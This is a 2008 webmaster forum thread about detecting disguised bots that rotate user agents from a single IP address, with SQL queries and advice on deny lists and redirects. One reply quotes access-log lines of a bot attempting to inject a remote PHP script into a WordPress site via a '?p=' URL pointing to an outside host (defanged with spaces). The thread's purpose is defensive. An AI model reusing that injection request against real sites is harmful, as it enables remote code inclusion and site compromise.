WebProWorld Part of WebProNews.com
Page One Link To Us Edit Profile Private Messages Archives FAQ RSS Feeds  
 

Go Back   WebProWorld > Webmaster, IT and Security Discussion > Internet Security Discussion Forum
Subscribe to the Newsletter FREE!


Register FAQ Members List Calendar Arcade Chatbox Mark Forums Read

Internet Security Discussion Forum This forum is for the discussion of security related issues. If you find a new Phishing scheme, spyware, virus or malicious site - let us know about it. If any of the above found you... here's where you ask for help.

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 05-12-2008, 12:48 PM
wige's Avatar
wige wige is offline
Moderator
WebProWorld Moderator
 

Join Date: Jun 2006
Location: United States
Posts: 1,647
wige RepRank 4wige RepRank 4wige RepRank 4
Default Deluge of the bots

Last Thursday, I developed and implemented a new logging system which aims to identify what products on my site are the most popular. The system is designed to be robust enough to both display to visitors a live list of what is popular, as well as show customized recommendations to users based on their browsing history. I designed the system to record not only the product viewed but the user's IP address and user agent, and record everything so I could get the largest data size possible to test the system with.

I came in today, and started analyzing the recorded data. In addition to the expected bots from Google/MSN/Yahoo, there were also the expected (and easily filtered) spambots. I also noticed a lot of visits from disguised bots, that I probably would never have found if not for the filters I added to this system. The following is from one such bot:

Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
220.95.108.239
2008-05-09 08:24:08
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
220.95.108.239
2008-05-09 08:31:45
Mozilla/5.0 (compatible; Googlebot/2.1; +How Google crawls my site)
220.95.108.239
2008-05-09 08:38:27
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
220.95.108.239
2008-05-09 08:44:52
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
220.95.108.239
2008-05-09 08:55:01
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5
220.95.108.239
2008-05-09 09:23:43
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3
220.95.108.239
2008-05-09 09:31:08
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
220.95.108.239
2008-05-09 09:36:59
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
220.95.108.239
2008-05-09 09:43:15
Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
220.95.108.239
2008-05-09 09:48:44
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
220.95.108.239
2008-05-09 09:56:14
Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
220.95.108.239
2008-05-09 09:59:23
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
220.95.108.239
2008-05-09 10:02:03
Googlebot/2.1 (+How Google crawls my site)
220.95.108.239
2008-05-09 10:04:41

Of course, this is only the traffic from that one bot, on one product page. There are hits from literally hundreds of similar bots on the same page, and this is spread across thousands of product pages.

Is there any way I might be able to programmatically filter these bad bots out? Even if it is just an SQL query that could spot the bots in a somewhat reliable way, and list them so I can remove them from the popularity system, and so I can add them to my deny list?
__________________
The best way to learn anything, is to question everything.
Interestingly Average Security Blog
Reply With Quote
  #2 (permalink)  
Old 05-12-2008, 03:28 PM
incrediblehelp's Avatar
incrediblehelp incrediblehelp is online now
Moderator
WebProWorld Moderator
 

Join Date: Jan 2004
Location: Live in Cincy Now
Posts: 7,438
incrediblehelp RepRank 4incrediblehelp RepRank 4incrediblehelp RepRank 4incrediblehelp RepRank 4
Default Re: Deluge of the bots

Why not filter by IP?
Reply With Quote
  #3 (permalink)  
Old 05-12-2008, 04:18 PM
Tech Manager Tech Manager is offline
WebProWorld Pro
 

Join Date: Jan 2008
Posts: 254
Tech Manager RepRank 1
Default Re: Deluge of the bots

It doesn't look like a normal bot. It looks more like a malicious bot. I've been seeing a lot of these lately. My suggestion is that you capture the IP and user agent. Store the incoming data and then query the IP address and User Agent. If you have more than two user agents with the corresponding IP then add them to your deny list.
__________________
I use Country IP Blocks as added security for my networks and servers.
Reply With Quote
  #4 (permalink)  
Old 05-12-2008, 04:28 PM
wige's Avatar
wige wige is offline
Moderator
WebProWorld Moderator
 

Join Date: Jun 2006
Location: United States
Posts: 1,647
wige RepRank 4wige RepRank 4wige RepRank 4
Default Re: Deluge of the bots

Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) as Products FROM pageviews GROUP BY IP ORDER BY Agents DESC; gives me the following table:

117.102.128.221 9 1
77.127.155.176 9 1
125.204.58.200 8 1
190.50.125.136 8 1
216.198.139.38 8 1
220.95.108.239 8 1
66.63.219.212 8 1
87.205.215.237 8 1
89.3.18.208 8 1
79.177.161.75 7 1
85.180.253.111 7 1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX. Also, if a user upgrades their browser, or has multiple computers on a home network, they could have more than one user agent logged per IP, and I would not want an automated process to block legitimate traffic as a result of that.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
__________________
The best way to learn anything, is to question everything.
Interestingly Average Security Blog

Last edited by wige : 05-12-2008 at 04:32 PM.
Reply With Quote
  #5 (permalink)  
Old 05-12-2008, 04:43 PM
Tech Manager Tech Manager is offline
WebProWorld Pro
 

Join Date: Jan 2008
Posts: 254
Tech Manager RepRank 1
Default Re: Deluge of the bots

Quote:
Originally Posted by wige View Post
Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) as Products FROM pageviews GROUP BY IP ORDER BY Agents DESC; gives me the following table:

117.102.128.221 9 1
77.127.155.176 9 1
125.204.58.200 8 1
190.50.125.136 8 1
216.198.139.38 8 1
220.95.108.239 8 1
66.63.219.212 8 1
87.205.215.237 8 1
89.3.18.208 8 1
79.177.161.75 7 1
85.180.253.111 7 1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
Let me give you an example of malicious ativity from likely botnets (most likely infected systems). The following is an example of a single IP address, showing multiple platforms and user agents. This particular bot is attempting to inject a malicious script into a WordPress site (I've added spaces so the malicious url can't be clicked on):

80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9"
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be a Google bot but it quickly becomes apparent that such is not the case. It's obviously attempting to bypass traditional filters that rely on certain criteria. In this case it attempts to cloaks its identity by changing the platform and user agent. This in itself is the signature of undesirable traffic.

In the above case I am redirecting the traffic elsewhere based on several different pieces of information: IP, Platform, User Agent and of course the obvious attempt to remotely inject a PHP script into the WordPress variables.

In your case I think it is best to contain the IP address if it has more than two changes. This would include platform and user agent. You could also add a time element into the mix and use it as the deciding factor with the first two elements..
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager : 05-12-2008 at 04:57 PM.
Reply With Quote
  #6 (permalink)  
Old 05-12-2008, 04:55 PM
wige's Avatar
wige wige is offline
Moderator
WebProWorld Moderator
 

Join Date: Jun 2006
Location: United States
Posts: 1,647
wige RepRank 4wige RepRank 4wige RepRank 4
Default Re: Deluge of the bots

Cool. My log does look quite similar to yours, so it is probably a similar system to what I am encountering. I guess the final part of this would be, is there a way I can specify a text file for Apache to use as a deny list that can be regularly updated without restarting the server?
__________________
The best way to learn anything, is to question everything.
Interestingly Average Security Blog
Reply With Quote
  #7 (permalink)  
Old 05-12-2008, 05:00 PM
Tech Manager Tech Manager is offline
WebProWorld Pro
 

Join Date: Jan 2008
Posts: 254
Tech Manager RepRank 1
Default Re: Deluge of the bots

You could use a text file but I suggest you use a database solution. Establish the acceptable criteria and then redirect traffic that doesn't meet that criteria. In fact, it's simple enough to redirect the traffic back to the questionable IP. You could even apprend the redirect with a message if you so choose.

Then you could add problematic IPs to your .htaccess file at a later date. But the database solution will be quicker and probably use less resources than loading the .htaccess file each time.
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager : 05-12-2008 at 05:06 PM.
Reply With Quote
Reply

  WebProWorld > Webmaster, IT and Security Discussion > Internet Security Discussion Forum


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Finding humor in the deluge of spam emails! TrafficProducer Breakroom (General: Any Topic) 3 04-08-2006 03:20 AM
Tracking Bots bretlawson Google Discussion Forum 0 01-09-2005 03:09 PM
Search Bots ohlson Graphics & Design Discussion Forum 1 09-10-2004 12:54 PM
Different Google Bots? Pokeey Google Discussion Forum 1 03-08-2004 11:56 AM
Shallow Bots - Deep Bots? jonathan-uk Google Discussion Forum 1 02-01-2004 08:32 PM


Search Engine Friendly URLs by vBSEO 3.0.0